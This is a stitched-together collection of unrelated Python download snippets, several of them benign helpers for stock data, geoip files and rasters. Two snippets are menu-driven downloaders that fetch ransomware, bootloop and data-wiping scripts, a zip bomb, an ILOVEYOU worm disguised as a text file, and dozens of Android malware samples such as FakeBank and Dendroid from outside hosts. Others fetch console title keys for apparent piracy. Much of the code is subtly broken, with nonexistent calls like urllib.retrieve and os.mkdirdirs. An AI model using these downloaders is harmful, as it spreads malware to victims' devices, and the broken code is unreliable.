def pull_historical_data(ticker_symbol,directory = "S&P"): try: urllib.retrieve(make_url(ticker_symbol),make_filename(ticker_symbol,directory)) except urllib.ContentTooShorError as e: outfile = open(make_filename(ticker_symbol,directory),"w") outfile.write(e.content) outfile.close()
def download_missing_tickets(self, missing): qty = len(missing) print('Missing {} tickets.'.format(qty)) if missing: for i in enumerate(missing, 1): titleid = i[1] print('Downloading {}: {} of {}'.format( titleid + '.tik', i[0], qty)) retrieve('{}/ticket/{}.tik'.format(keysite, titleid), os.path.join('ticket', '{}.tik'.format(titleid)))
def update_files(self): if not os.path.isdir(self.directory): LOG.info("Creating geoip directory: %s", self.directory) os.mkdirdirs(self.directory, 0700) LOG.info("Downloading file %s ...", self.url) filename = directory + '/all-zones.tar.gz' urllib.retrieve(self.url, filename) LOG.info("Extracting targz...") tar = tarfile.open(filename) tar.extractall(path = self.directory) tar.close() LOG.info("Done updating files")
def import_raster(in_filepath): global args global possible_subdirs res = get_import_raster_res() num_hwords=res*res dtype = [('data', '>i2', (res,res))] if get_ext(in_filepath) == '.hgt': # if file doesnt exist, download from server then open if not os.path.isfile(in_filepath): urllib.retrieve(get_url_from_server(in_filename), in_filename) raster = np.memmap(in_filepath, np.dtype('>i2'), shape =num_hwords, mode = 'r').reshape((res,res)) else: return None new_res = args.tile_res if new_res != res: scale_factor = float(new_res)/res, float(new_res)/res raster = skimage.transform.rescale(raster, scale=scale_factor, mode='wrap', preserve_range=True, multichannel=False, anti_aliasing=True) return raster
def download_and_unzip(uri): """ Downloads and, if necessary, unzips the given uri. Returns the path to the downloaded tempfile, which the using code should take care of deleting. """ parsed = urlparse(uri) gzipped = uri.endswith('.gz') result_path = "" if not parsed.scheme: result_path = uri if not gzipped: suffix = os.path.basename(result_path) (_, filecopy) = mkstemp(suffix=suffix[suffix.index('.'):]) with open(result_path, 'rb') as fin, \ open(filecopy, 'wb') as fout: shutil.copyfileobj(fin, fout) return filecopy else: suffix = os.path.basename(parsed.path) (_, tmp) = mkstemp(suffix=suffix[suffix.index('.'):]) if parsed.scheme == "s3": client = boto3.client("s3") bucket = parsed.netloc key = parsed.path[1:] client.download_file(bucket, key, tmp) elif parsed.scheme == "http": urllib.retrieve(uri, tmp) else: raise Exception("Unsupported scheme: %s" % parsed.scheme) result_path = tmp if gzipped: suffix = os.path.basename(result_path) suffix = os.path.splitext(suffix)[0] (_, unzipped) = mkstemp(suffix=suffix) with gzip.open(result_path, 'rb') as z, \ open(unzipped, 'wb') as uz: shutil.copyfileobj(z, uz) result_path = unzipped return result_path
def download_titlekeys_file(self): print('Downloading titlekeys.json from {}'.format(keysite)) retrieve('{}/json'.format(keysite), 'titlekeys.json')
urllib.urlretrieve("https://github.com/JA1D3V/AndroidRansomware/archive/master.zip", 'AndroidRansomware.zip') elif shfile.strip() in "02 2".split(): urllib.urlretrieve("http://override.waper.co/files/bootloop.apk", 'bootloop.sh') elif shfile.strip() in "03 3".split(): urllib.urlretrieve("http://override.waper.co/files/dateater.apk", 'data-eater.sh') elif shfile.strip() in "04 4".split(): urllib.urlretrieve("http://override.waper.co/files/freeze.apk", 'freeze.sh') elif shfile.strip() in "05 5".split(): urllib.urlretrieve("http://override.waper.co/files/zipbombsh.apk", 'zipbomb.sh') else: print "%s[!] ERROR: Wrong Input...%s" % (R,N) elif vbugmap.strip() in 'vbug_bat'.split(): print list_bat batfile=raw_input("vbugmap*> select ") if batfile.strip() in "01 1".split(): urllib.retrieve("http://override.waper.co/files/rip.apk", 'RIP.bat') elif batfile.strip() in "02 2".split(): urllib.urlretrieve("http://override.waper.co/files/koce.apk", 'koce.bat') elif batfile.strip() in "03 3".split(): urllib.urlretrieve("http://override.waper.co/files/regeater.apk", 'reg-eater.bat') elif batfile.strip() in "04 4".split(): urllib.urlretrieve("http://override.waper.co/files/404.apk", '404.bat') elif batfile.strip() in "05 5".split(): urllib.urlretrieve("http://override.waper.co/files/cmd.apk", 'CMD.bat') else: print "%s[!] ERROR: Wrong Input...%s" % (R,N) elif vbugmap.strip() in 'vbug_vbs'.split(): print list_vbs vbsfile=raw_input("vbugmap*> select ") if vbsfile.strip() in "01 1".split(): urllib.urlretrieve("http://override.waper.co/files/iloveyou.apk", 'LOVE-LETTER-FOR-YOU.TXT.vbs')
def pilih1(): pol = raw_input("\033[1;91m\t> \033[1;97m") if not pol: exit() if pol == "1" or pol == "01": tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Adware.apk", "Adware.apk") os.mkdir("virus") os.system( "mv /data/data/com.termux/files/home/malware/Adware.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "2" or pol == "02": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Agent.apk", "Agent.apk") os.system( "mv /data/data/com.termux/files/home/malware/Agent.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "3" or pol == "03": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/ArtStation.apk", "ArtStation.apk") os.system( "mv /data/data/com.termux/files/home/malware/ArtStation.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "4" or pol == "04": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/BadNews.A.apk", "BadNews.A.apk") os.system( "mv /data/data/com.termux/files/home/malware/BadNews.A.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "5" or pol == "05": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Bios.NativeMaliciousCode.apk", "Bios.NativeMaliciousCode.apk") os.system( "mv /data/data/com.termux/files/home/malware/Bios.NativeMaliciousCode.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "6" or pol == "06": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Blatantsms.apk", "Blatantsms.apk") os.system( "mv /data/data/com.termux/files/home/malware/Blatantsms.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "7" or pol == "07": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/BrainTest.apk", "BrainTest.apk") os.system( "mv /data/data/com.termux/files/home/malware/BrainTest.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "8" or pol == "08": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Claco.A.apk", "Claco.A.apk") os.system( "mv /data/data/com.termux/files/home/malware/Claco.A.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "9" or pol == "09": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Dropdialer.apk", "Dropdialer.apk") os.system( "mv /data/data/com.termux/files/home/malware/Dropdialer.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "10": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/FakeBank.B.apk", "FakeBank.B.apk") os.system( "mv /data/data/com.termux/files/home/malware/FakeBank.B.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "11": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/FakeCMCC.A.apk", "FakeCMCC.A.apk") os.system( "mv /data/data/com.termux/files/home/malware/FakeCMCC.A.apk /data/data/com.termux/files/home/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "12": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/FakeDoc.apk", "FakeDoc.apk") os.system("mv $HOME/malware/FakeDoc.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "13": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/FakeValidation.apk", "FakeValidation.apk") os.system("mv $HOME/malware/FakeValidation.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "14": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Fobus.apk", "Fobus.apk") os.system("mv $HOME/malware/Fobus.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "15": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/GinMaster.Z.AdvancedObfuscation.apk", "GinMaster.Z.AdvancedObfuscation.apk") os.system( "mv $HOME/malware/GinMaster.Z.AdvancedObfuscation.apk $HOME/malware/virus" ) print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "16": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Masnu.apk", "Masnu.apk") os.system("mv $HOME/malware/Masnu.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "17": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Minecraft2.apk", "Minecraft2.apk") os.system("mv $HOME/malware/Minecraft2.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "18": try: os.mkdir("virus") except OSError: pass tik() virus.retrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/MusicPlayerAdWare.apk", "MusicPlayerAdWare.apk") os.system("mv $HOME/malware/MusicPlayerAdWare.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "19": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Omigo.apk", "Omigo.apk") os.system("mv $HOME/malware/Omigo.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "20": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Opfake.apk", "Opfake.apk") os.system("mv $HOME/malware/Opfake.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "21": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Settings.apk", "Settings.apk") os.system("mv $HOME/malware/Settings.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "22": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/SmsWorker.apk", "SmsWorker.apk") os.system("mv $HOME/malware/SmsWorker.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "23": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/Vietcon.apk", "Vietcon.apk") os.system("mv $HOME/malware/Vietcon.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "24": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/bom-zip.zip", "bom-zip.zip") os.system("mv $HOME/malware/bom-zip.zip $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "25": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/bootloop.sh", "bootloop.sh") os.system("mv $HOME/malware/bootloop.sh $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "26": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/candy_corn.apk", "candy_corn.apk") os.system("mv $HOME/malware/candy_corn.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "27": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/cat.apk", "Cat.apk") os.system("mv $HOME/malware/Cat.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "28": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/chistescortos.apk", "chistescortos.apk") os.system("mv $HOME/malware/chistescortos.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "29": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/crd.apk", "crd.apk") os.system("mv $HOME/malware/crd.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "30": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/data-eater.sh", "data-eater.sh") os.system("mv $HOME/malware/data-eater.sh $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "31": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/dendroid.apk", "dendroid.apk") os.system("mv $HOME/malware/dendroid.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "32": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/ds.apk", "ds.apk") os.system("mv $HOME/malware/ds.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "33": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/facebook.apk", "facebook.apk") os.system("mv $HOME/malware/facebook.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "34": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/fake_av.apk", "fake_av.apk") os.system("mv $HOME/malware/fake_av.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" elif pol == "35": try: os.mkdir("virus") except OSError: pass tik() virus.urlretrieve( "https://github.com/Ractomes/Viruses/blob/master/samples/chistespicanticos.apk", "chistespicanticos.apk") os.system("mv $HOME/malware/chistespicanticos.apk $HOME/malware/virus") print "\n\033[1;91m\t> \033[1;97mDone" else: exit()
def downloadPhoto(self, url, albumName): if (url == None or albumName == None): return None photoName = url[url.rindex('/')+1:] url = url.replace(photoName, "d/" + photoName) urllib.retrieve(url, work + '/' + albumName + '/' + photoName)
def _download_url(self, url, filename): from urllib import urlretrieve as retrieve import os if not os.path.exists(filename): print "Saving ", url, " as ", filename retrieve(url, filename)